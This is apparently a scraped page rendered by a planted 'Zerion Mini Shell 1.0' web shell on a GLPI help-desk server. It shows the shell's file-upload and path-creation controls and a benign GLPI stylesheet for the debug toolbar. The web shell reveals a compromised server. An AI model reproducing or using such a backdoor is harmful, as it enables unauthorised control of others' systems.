%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/projetos/suporte.iigd.com.br/css/includes/components/
Upload File :
Create Path :
Current File : //var/www/projetos/suporte.iigd.com.br/css/includes/components/_debug-toolbar.scss

/*!
 * ---------------------------------------------------------------------
 *
 * GLPI - Gestionnaire Libre de Parc Informatique
 *
 * http://glpi-project.org
 *
 * @copyright 2015-2024 Teclib' and contributors.
 * @copyright 2003-2014 by the INDEPNET Development Team.
 * @licence   https://www.gnu.org/licenses/gpl-3.0.html
 *
 * ---------------------------------------------------------------------
 *
 * LICENSE
 *
 * This file is part of GLPI.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * ---------------------------------------------------------------------
 */

// Our tabler version does not support datagrid
// TODO: remove after updating tabler
.datagrid {
    --tblr-datagrid-padding   : 1.5rem;
    --tblr-datagrid-item-width: 15rem;

    display                   : grid;
    grid-gap                  : var(--tblr-datagrid-padding);
    grid-template-columns     : repeat(auto-fit, minmax(var(--tblr-datagrid-item-width), 1fr));
}

.datagrid-title {
    font-size     : .625rem;
    font-weight   : 600;
    text-transform: uppercase;
    letter-spacing: .04em;
    line-height   : 1rem;
    color         : var(--tblr-muted);
    margin-bottom : .25rem;
}

#debug-toolbar {
    z-index: 9999;
    outline: none;

    .debug-toolbar-badge button {
        box-shadow: none;
    }

    .debug-toolbar-widgets .debug-toolbar-widget {
        &.active, &:hover {
            border-top: 3px solid $primary !important;
            margin-top : -3px;
        }

        button {
            box-shadow: none;
        }
    }

    #debug-toolbar-expanded-content {
        height: 30vh;
        overflow: auto;

        #debug-requests-table thead th {
            position: sticky;
            top: 0;
        }

        .category-badge {
            padding: 5px;
            border-radius: 25%;
        }

        .split-panel-h {
            .left-panel {
                flex: 0 0 33%;
                border-right: 1px solid #808080;
                min-width: 100px;
            }

            .resize-handle {
                cursor: col-resize;
                width: 10px;
                z-index: 1030;
                margin-left: -0.5rem;
                margin-right: -0.25rem;
            }
        }
    }
}

body.debug-active:not(.debug-folded) {
    .search_page {
        .search-container {
            @include media-breakpoint-up(lg) {
                height: calc(100vh - #{$contextbar-height} - #{$content-margin} - 50px);
            }
        }
    }

    .tab-pane:not([id^="tab-Ticket_main"]) {
        margin-bottom: 50px;
    }

    .itil-object {
        @include media-breakpoint-up(lg) {
            height: calc(100vh - 187px - 46px);
        }
    }

    form.new-itil-object .itil-object {
        @include media-breakpoint-up(lg) {
            height: calc(100vh - 187px - 5px);
        }
    }


    &.horizontal-layout {
        .itil-object {
            @include media-breakpoint-up(lg) {
                height: calc(100vh - 257px - 46px);
            }
        }
    }

    .search-footer,
    .itil-footer {
        bottom: 46px;
    }
}

Zerion Mini Shell 1.0